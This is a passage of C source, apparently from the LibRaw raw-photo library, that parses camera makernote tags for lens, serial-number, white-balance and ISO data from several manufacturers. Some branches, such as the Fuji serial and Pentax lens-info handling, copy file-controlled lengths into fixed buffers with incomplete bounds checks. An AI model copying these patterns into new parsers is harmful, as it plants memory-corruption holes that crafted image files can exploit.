!strncasecmp(model, "M Monochrom", 11) ||
!strncasecmp(model, "Leica M Monochrom", 11))
{
if (!uptag)
{
base = ftell(ifp) - 10;
fseek (ifp, 8, SEEK_CUR);
}
else if (uptag == 0x3400)
{
fseek (ifp, 10, SEEK_CUR);
base += 10;
}
}
else if (!strncasecmp(model, "LEICA T", 7))
{
base = ftell(ifp)-8;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_T;
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
else if (!strncasecmp(model, "LEICA SL", 8))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_SL;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
}
#endif
}
entries = get2();
if (entries > 1000) return;
morder = order;
while (entries--) {
order = morder;
tiff_get (base, &tag, &type, &len, &save);
tag |= uptag << 16;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 _pos = ftell(ifp);
if(len > 8 && _pos+len > 2* fsize) continue;
if (!strncmp(make, "Canon",5))
{
if (tag == 0x000d && len < 256000) // camera info
{
CanonCameraInfo = (uchar*)malloc(MAX(16,len));
fread(CanonCameraInfo, len, 1, ifp);
lenCanonCameraInfo = len;
}
else if (tag == 0x10) // Canon ModelID
{
unique_id = get4();
if (unique_id == 0x03740000) unique_id = 0x80000374; // M3
if (unique_id == 0x03840000) unique_id = 0x80000384; // M10
if (unique_id == 0x03940000) unique_id = 0x80000394; // M5
setCanonBodyFeatures(unique_id);
if (lenCanonCameraInfo)
{
processCanonCameraInfo(unique_id, CanonCameraInfo,lenCanonCameraInfo);
free(CanonCameraInfo);
CanonCameraInfo = 0;
lenCanonCameraInfo = 0;
}
}
else parseCanonMakernotes (tag, type, len);
}
else if (!strncmp(make, "FUJI", 4)) {
if (tag == 0x0010) {
char FujiSerial[sizeof(imgdata.shootinginfo.InternalBodySerial)];
char *words[4];
char yy[2], mm[3], dd[3], ystr[16], ynum[16];
int year, nwords, ynum_len;
unsigned c;
stmread(FujiSerial, len, ifp);
nwords = getwords(FujiSerial, words, 4,sizeof(imgdata.shootinginfo.InternalBodySerial));
for (int i = 0; i < nwords; i++) {
mm[2] = dd[2] = 0;
if (strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1) < 18)
if (i == 0)
strncpy (imgdata.shootinginfo.InternalBodySerial,
words[0],
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
else
{
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
snprintf (tbuf, sizeof(tbuf), "%s %s",
imgdata.shootinginfo.InternalBodySerial, words[i]);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
}
else
{
strncpy (dd, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-14, 2);
strncpy (mm, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-16, 2);
strncpy (yy, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-18, 2);
year = (yy[0]-'0')*10 + (yy[1]-'0');
if (year <70) year += 2000; else year += 1900;
ynum_len = (int)strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-18;
strncpy(ynum, words[i], ynum_len);
ynum[ynum_len] = 0;
for ( int j = 0; ynum[j] && ynum[j+1] && sscanf(ynum+j, "%2x", &c); j += 2) ystr[j/2] = c;
ystr[ynum_len / 2 + 1] = 0;
strcpy (model2, ystr);
if (i == 0) {
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
if (nwords == 1)
snprintf (tbuf,sizeof(tbuf),
"%s %s %d:%s:%s",
words[0]+strnlen(words[0],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12,
ystr, year, mm, dd);
else
snprintf (tbuf,sizeof(tbuf),
"%s %d:%s:%s %s",
ystr, year, mm, dd,
words[0]+strnlen(words[0],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
} else {
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
snprintf (tbuf, sizeof(tbuf),
"%s %s %d:%s:%s %s",
imgdata.shootinginfo.InternalBodySerial, ystr, year, mm, dd,
words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
}
}
}
}
else
parseFujiMakernotes (tag, type);
}
else if (!strncasecmp(make, "LEICA", 5))
{
if (((tag == 0x035e) || (tag == 0x035f)) && (type == 10) && (len == 9))
{
int ind = tag == 0x035e?0:1;
for (int j=0; j < 3; j++)
FORCC imgdata.color.dng_color[ind].forwardmatrix[j][c]= getreal(type);
}
if ((tag == 0x0303) && (type != 4))
{
stmread(imgdata.lens.makernotes.Lens, len, ifp);
}
if ((tag == 0x3405) ||
(tag == 0x0310) ||
(tag == 0x34003405))
{
imgdata.lens.makernotes.LensID = get4();
imgdata.lens.makernotes.LensID =
((imgdata.lens.makernotes.LensID>>2)<<8) |
(imgdata.lens.makernotes.LensID & 0x3);
if (imgdata.lens.makernotes.LensID != -1)
{
if ((model[0] == 'M') ||
!strncasecmp (model, "LEICA M", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_M;
}
else if ((model[0] == 'S') ||
!strncasecmp (model, "LEICA S", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_S;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_S;
}
}
}
else if (
((tag == 0x0313) || (tag == 0x34003406)) &&
(fabs(imgdata.lens.makernotes.CurAp) < 0.17f) &&
((type == 10) || (type == 5))
)
{
imgdata.lens.makernotes.CurAp = getreal(type);
if (imgdata.lens.makernotes.CurAp > 126.3)
imgdata.lens.makernotes.CurAp = 0.0f;
}
else if (tag == 0x3400)
{
parse_makernote (base, 0x3400);
}
}
else if (!strncmp(make, "NIKON",5))
{
if (tag == 0x000a)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
else if (tag == 0x0012)
{
char a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c) imgdata.other.FlashEC = (float)(a*b)/(float)c;
}
else if (tag == 0x0082) // lens attachment
{
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
}
else if (tag == 0x0083) // lens type
{
imgdata.lens.nikon.NikonLensType = fgetc(ifp);
}
else if (tag == 0x0084) // lens
{
imgdata.lens.makernotes.MinFocal = getreal(type);
imgdata.lens.makernotes.MaxFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type);
}
else if (tag == 0x008b) // lens f-stops
{
uchar a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c)
{
imgdata.lens.nikon.NikonLensFStops = a*b*(12/c);
imgdata.lens.makernotes.LensFStops =
(float)imgdata.lens.nikon.NikonLensFStops /12.0f;
}
}
else if (tag == 0x0093)
{
i = get2();
if ((i == 7) || (i == 9))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0098) // contains lens data
{
for (i = 0; i < 4; i++)
{
NikonLensDataVersion = NikonLensDataVersion * 10 + fgetc(ifp) - '0';
}
switch (NikonLensDataVersion)
{
case 100: lenNikonLensData = 9; break;
case 101:
case 201: // encrypted, starting from v.201
case 202:
case 203: lenNikonLensData = 15; break;
case 204: lenNikonLensData = 16; break;
case 400: lenNikonLensData = 459; break;
case 401: lenNikonLensData = 590; break;
case 402: lenNikonLensData = 509; break;
case 403: lenNikonLensData = 879; break;
}
if(lenNikonLensData>0)
{
table_buf = (uchar*)malloc(lenNikonLensData);
fread(table_buf, lenNikonLensData, 1, ifp);
if ((NikonLensDataVersion < 201) && lenNikonLensData)
{
processNikonLensData(table_buf, lenNikonLensData);
free(table_buf);
lenNikonLensData = 0;
}
}
}
else if (tag == 0x00a0)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x00a8) // contains flash data
{
for (i = 0; i < 4; i++)
{
NikonFlashInfoVersion = NikonFlashInfoVersion * 10 + fgetc(ifp) - '0';
}
}
}
else if (!strncmp(make, "OLYMPUS", 7))
{
switch (tag) {
case 0x0404:
case 0x101a:
case 0x20100101:
if (!imgdata.shootinginfo.BodySerial[0])
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0x20100102:
if (!imgdata.shootinginfo.InternalBodySerial[0])
stmread(imgdata.shootinginfo.InternalBodySerial, len, ifp);
break;
case 0x0207:
case 0x20100100:
{
uchar sOlyID[8];
unsigned long long OlyID;
fread (sOlyID, MIN(len,7), 1, ifp);
sOlyID[7] = 0;
OlyID = sOlyID[0];
i = 1;
while (i < 7 && sOlyID[i])
{
OlyID = OlyID << 8 | sOlyID[i];
i++;
}
setOlympusBodyFeatures(OlyID);
}
break;
case 0x1002:
imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, getreal(type)/2);
break;
case 0x20401112:
imgdata.makernotes.olympus.OlympusCropID = get2();
break;
case 0x20401113:
FORC4 imgdata.makernotes.olympus.OlympusFrame[c] = get2();
break;
case 0x20100201:
{
unsigned long long oly_lensid [3];
oly_lensid[0] = fgetc(ifp);
fgetc(ifp);
oly_lensid[1] = fgetc(ifp);
oly_lensid[2] = fgetc(ifp);
imgdata.lens.makernotes.LensID =
(oly_lensid[0] << 16) | (oly_lensid[1] << 8) | oly_lensid[2];
}
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FT;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FT;
if (((imgdata.lens.makernotes.LensID < 0x20000) ||
(imgdata.lens.makernotes.LensID > 0x4ffff)) &&
(imgdata.lens.makernotes.LensID & 0x10))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_mFT;
}
break;
case 0x20100202:
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0x20100203:
stmread(imgdata.lens.makernotes.Lens, len, ifp);
break;
case 0x20100205:
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100206:
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100207:
imgdata.lens.makernotes.MinFocal = (float)get2();
break;
case 0x20100208:
imgdata.lens.makernotes.MaxFocal = (float)get2();
if (imgdata.lens.makernotes.MaxFocal > 1000.0f)
imgdata.lens.makernotes.MaxFocal = imgdata.lens.makernotes.MinFocal;
break;
case 0x2010020a:
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100301:
imgdata.lens.makernotes.TeleconverterID = fgetc(ifp) << 8;
fgetc(ifp);
imgdata.lens.makernotes.TeleconverterID =
imgdata.lens.makernotes.TeleconverterID | fgetc(ifp);
break;
case 0x20100303:
stmread(imgdata.lens.makernotes.Teleconverter, len, ifp);
break;
case 0x20100403:
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
break;
}
}
else if ((!strncmp(make, "PENTAX", 6) || !strncmp(make, "RICOH", 5)) &&
!strncmp(model, "GR", 2))
{
if (tag == 0x0005)
{
char buffer[17];
int count=0;
fread(buffer, 16, 1, ifp);
buffer[16] = 0;
for (int i=0; i<16; i++)
{
// sprintf(imgdata.shootinginfo.InternalBodySerial+2*i, "%02x", buffer[i]);
if ((isspace(buffer[i])) ||
(buffer[i] == 0x2D) ||
(isalnum(buffer[i])))
count++;
}
if (count == 16)
{
sprintf (imgdata.shootinginfo.BodySerial, "%8s", buffer+8);
buffer[8] = 0;
sprintf (imgdata.shootinginfo.InternalBodySerial, "%8s", buffer);
}
else
{
sprintf (imgdata.shootinginfo.BodySerial, "%02x%02x%02x%02x", buffer[4], buffer[5], buffer[6], buffer[7]);
sprintf (imgdata.shootinginfo.InternalBodySerial, "%02x%02x%02x%02x", buffer[8], buffer[9], buffer[10], buffer[11]);
}
}
else if ((tag == 0x1001) && (type == 3))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensID = -1;
imgdata.lens.makernotes.FocalType = 1;
}
else if ((tag == 0x100b) && (type == 10))
{
imgdata.other.FlashEC = getreal(type);
}
else if ((tag == 0x1017) && (get2() == 2))
{
strcpy(imgdata.lens.makernotes.Attachment, "Wide-Angle Adapter");
}
else if (tag == 0x1500)
{
imgdata.lens.makernotes.CurFocal = getreal(type);
}
}
else if (!strncmp(make, "RICOH", 5) &&
strncmp(model, "PENTAX", 6))
{
if ((tag == 0x0005) && !strncmp(model, "GXR", 3))
{
char buffer[9];
buffer[8] = 0;
fread(buffer, 8, 1, ifp);
sprintf (imgdata.shootinginfo.InternalBodySerial, "%8s", buffer);
}
else if ((tag == 0x100b) && (type == 10))
{
imgdata.other.FlashEC = getreal(type);
}
else if ((tag == 0x1017) && (get2() == 2))
{
strcpy(imgdata.lens.makernotes.Attachment, "Wide-Angle Adapter");
}
else if (tag == 0x1500)
{
imgdata.lens.makernotes.CurFocal = getreal(type);
}
else if ((tag == 0x2001) && !strncmp(model, "GXR", 3))
{
short ntags, cur_tag;
fseek(ifp, 20, SEEK_CUR);
ntags = get2();
cur_tag = get2();
while (cur_tag != 0x002c)
{
fseek(ifp, 10, SEEK_CUR);
cur_tag = get2();
}
fseek(ifp, 6, SEEK_CUR);
fseek(ifp, get4()+20, SEEK_SET);
stread(imgdata.shootinginfo.BodySerial, 12, ifp);
get2();
imgdata.lens.makernotes.LensID = getc(ifp) - '0';
switch(imgdata.lens.makernotes.LensID) {
case 1:
case 2:
case 3:
case 5:
case 6:
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_RicohModule;
break;
case 8:
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensID = -1;
break;
default:
imgdata.lens.makernotes.LensID = -1;
}
fseek(ifp, 17, SEEK_CUR);
stread(imgdata.lens.LensSerial, 12, ifp);
}
}
else if ((!strncmp(make, "PENTAX", 6) ||
!strncmp(model, "PENTAX", 6) ||
(!strncmp(make, "SAMSUNG", 7) && dng_version)) &&
strncmp(model, "GR", 2))
{
if (tag == 0x0005)
{
unique_id = get4();
setPentaxBodyFeatures(unique_id);
}
else if (tag == 0x0013)
{
imgdata.lens.makernotes.CurAp = (float)get2()/10.0f;
}
else if (tag == 0x0014)
{
PentaxISO(get2());
}
else if (tag == 0x001d)
{
imgdata.lens.makernotes.CurFocal = (float)get4()/100.0f;
}
else if (tag == 0x003f)
{
imgdata.lens.makernotes.LensID = fgetc(ifp) << 8 | fgetc(ifp);
}
else if (tag == 0x004d)
{
if (type == 9) imgdata.other.FlashEC = getreal(type) / 256.0f;
else imgdata.other.FlashEC = (float) ((signed short) fgetc(ifp)) / 6.0f;
}
else if (tag == 0x007e)
{
imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = (long)(-1) * get4();
}
else if (tag == 0x0207)
{
if(len < 65535) // Safety belt
PentaxLensInfo(imgdata.lens.makernotes.CamID, len);
}
else if (tag == 0x020d)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020e)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020f)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0210)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0211)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0212)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0213)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0214)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0221)
{
int nWB = get2();
if(nWB<=sizeof(imgdata.color.WBCT_Coeffs)/sizeof(imgdata.color.WBCT_Coeffs[0]))
for (int i = 0; i < nWB; i++)
{
imgdata.color.WBCT_Coeffs[i][0] = (unsigned)0xcfc6 - get2();
fseek(ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = get2();
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 0x2000;
imgdata.color.WBCT_Coeffs[i][3] = get2();
}
}
else if (tag == 0x0215)
{
fseek (ifp, 16, SEEK_CUR);
sprintf(imgdata.shootinginfo.InternalBodySerial, "%d", get4());
}
else if (tag == 0x0229)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x022d)
{
fseek (ifp,2,SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0239) // Q-series lens info (LensInfoQ)
{
char LensInfo [20];
fseek (ifp, 2, SEEK_CUR);
stread(imgdata.lens.makernotes.Lens, 30, ifp);
strcat(imgdata.lens.makernotes.Lens, " ");
stread(LensInfo, 20, ifp);
strcat(imgdata.lens.makernotes.Lens, LensInfo);
}
}
else if (!strncmp(make, "SAMSUNG", 7))
{
if (tag == 0x0002)
{
if(get4() == 0x2000)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (!strncmp(model, "NX mini", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX_M;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0003)
{
unique_id = imgdata.lens.makernotes.CamID = get4();
}
else if (tag == 0xa002)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0xa003)
{
imgdata.lens.makernotes.LensID = get2();
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (tag == 0xa005)
{
stmread(imgdata.lens.InternalLensSerial, len, ifp);
}
else if (tag == 0xa019)
{
imgdata.lens.makernotes.CurAp = getreal(type);
}
else if (tag == 0xa01a)
{
imgdata.lens.makernotes.FocalLengthIn35mmFormat = get4() / 10.0f;
if (imgdata.lens.makernotes.FocalLengthIn35mmFormat < 10.0f)
imgdata.lens.makernotes.FocalLengthIn35mmFormat *= 10.0f;
}
}
else if (!strncasecmp(make, "SONY", 4) ||
!strncasecmp(make, "Konica", 6) ||
!strncasecmp(make, "Minolta", 7) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "Lusso", 5) ||
!strncasecmp(model, "HV",2))))
{
ushort lid;
if (tag == 0xb001) // Sony ModelID
{
unique_id = get2();
setSonyBodyFeatures(unique_id);
if (table_buf_0x9050_present)
{
process_Sony_0x9050(table_buf_0x9050, unique_id);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
if (table_buf_0x940c_present)
{
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
process_Sony_0x940c(table_buf_0x940c);
}
free (table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if ((tag == 0x0010) && // CameraInfo
strncasecmp(model, "DSLR-A100", 9) &&
strncasecmp(model, "NEX-5C", 6) &&
!strncasecmp(make, "SONY", 4) &&
((len == 368) || // a700
(len == 5478) || // a850, a900
(len == 5506) || // a200, a300, a350
(len == 6118) || // a230, a290, a330, a380, a390
// a450, a500, a550, a560, a580
// a33, a35, a55
// NEX3, NEX5, NEX5C, NEXC3, VG10E
(len == 15360))
)
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (memcmp(table_buf, "\xff\xff\xff\xff\xff\xff\xff\xff", 8) &&
memcmp(table_buf, "\x00\x00\x00\x00\x00\x00\x00\x00", 8))
{
switch (len)
{
case 368:
case 5478:
// a700, a850, a900: CameraInfo
if (table_buf[0] | table_buf[3])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[0]) * 100 + bcd2dec(table_buf[3]);
if (table_buf[2] | table_buf[5])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[2]) * 100 + bcd2dec(table_buf[5]);
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[4]) / 10.0f;
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[7]) / 10.0f;
parseSonyLensFeatures(table_buf[1], table_buf[6]);
break;
default:
// CameraInfo2 & 3
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
}
free(table_buf);
}
else if ((tag == 0x0020) && // WBInfoA100, needs 0xb028 processing
!strncasecmp(model, "DSLR-A100", 9))
{
fseek(ifp,0x49dc,SEEK_CUR);
stmread(imgdata.shootinginfo.InternalBodySerial, 12, ifp);
}
else if (tag == 0x0104)
{
imgdata.other.FlashEC = getreal(type);
}
else if (tag == 0x0105) // Teleconverter
{
imgdata.lens.makernotes.TeleconverterID = get2();
}
else if (tag == 0x0114 && len < 256000) // CameraSettings
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
switch (len) {
case 280:
case 364:
case 332:
// CameraSettings and CameraSettings2 are big endian
if (table_buf[2] | table_buf[3])
{
lid = (((ushort)table_buf[2])<<8) |
((ushort)table_buf[3]);
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/8.0f-1.0f)/2.0f);
}
break;
case 1536:
case 2048:
// CameraSettings3 are little endian
parseSonyLensType2(table_buf[1016], table_buf[1015]);
if (imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF)
{
switch (table_buf[153]) {
case 16: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A; break;
case 17: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E; break;
}
}
break;
}
free(table_buf);
}
else if (tag == 0x9050 && len < 256000) // little endian
{
table_buf_0x9050 = (uchar*)malloc(len);
table_buf_0x9050_present = 1;
fread(table_buf_0x9050, len, 1, ifp);
if (imgdata.lens.makernotes.CamID)
{
process_Sony_0x9050(table_buf_0x9050, imgdata.lens.makernotes.CamID);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
}
else if (tag == 0x940c && len <256000)
{
table_buf_0x940c = (uchar*)malloc(len);
table_buf_0x940c_present = 1;
fread(table_buf_0x940c, len, 1, ifp);
if ((imgdata.lens.makernotes.CamID) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E))
{
process_Sony_0x940c(table_buf_0x940c);
free(table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if (((tag == 0xb027) || (tag == 0x010c)) && (imgdata.lens.makernotes.LensID == -1))
{
imgdata.lens.makernotes.LensID = get4();
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
if (tag == 0x010c) imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
}
else if (tag == 0xb02a && len < 256000) // Sony LensSpec
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
free(table_buf);
}
}
fseek(ifp,_pos,SEEK_SET);
#endif
if (tag == 2 && strstr(make,"NIKON") && !iso_speed)
iso_speed = (get2(),get2());
if (tag == 37 && strstr(make,"NIKON") && (!iso_speed || iso_speed == 65535))
{
unsigned char cc;
fread(&cc,1,1,ifp);
iso_speed = int(100.0 * libraw_powf64(2.0f,float(cc)/12.0-5.0));
}
if (tag == 4 && len > 26 && len < 35) {
if ((i=(get4(),get2())) != 0x7fff && (!iso_speed || iso_speed == 65535))
iso_speed = 50 * libraw_powf64(2.0, i/32.0 - 4);
#ifdef LIBRAW_LIBRARY_BUILD
get4();
#else
if ((i=(get2(),get2())) != 0x7fff && !aperture)
aperture = libraw_powf64(2.0, i/64.0);
#endif
if ((i=get2()) != 0xffff && !shutter)
shutter = libraw_powf64(2.0, (short) i/-32.0);
wbi = (get2(),get2());
shot_order = (get2(),get2());
}
if ((tag == 4 || tag == 0x114) && !strncmp(make,"KONICA",6)) {
fseek (ifp, tag == 4 ? 140:160, SEEK_CUR);
switch (get2()) {
case 72: flip = 0; break;
case 76: flip = 6; break;
case 82: flip = 5; break;
}
}
if (tag == 7 && type == 2 && len > 20)
fgets (model2, 64, ifp);
if (tag == 8 && type == 4)
shot_order = get4();
if (tag == 9 && !strncmp(make,"Canon",5))
fread (artist, 64, 1, ifp);
if (tag == 0xc && len == 4)
FORC3 cam_mul[(c << 1 | c >> 1) & 3] = getreal(type);
if (tag == 0xd && type == 7 && get2() == 0xaaaa) {
for (c=i=2; (ushort) c != 0xbbbb && i < len; i++)
c = c << 8 | fgetc(ifp);
while ((i+=4) < len-5)
if (get4() == 257 && (i=len) && (c = (get4(),fgetc(ifp))) < 3)
flip = "065"[c]-'0';
}
#ifndef LIBRAW_LIBRARY_BUILD
if (tag == 0x10 && type == 4) unique_id = get4();
#endif
#ifdef LIBRAW_LIBRARY_BUILD
INT64 _pos2 = ftell(ifp);
if (!strncasecmp(make,"Olympus",7))
{
short nWB, tWB;
if ((tag == 0x20300108) || (tag == 0x20310109))
imgdata.makernotes.olympus.ColorSpace = get2();
if ((tag == 0x20400102) && (len == 2) &&
(!strncasecmp(model, "E-410", 5) || !strncasecmp(model, "E-510", 5)))
{
int i;
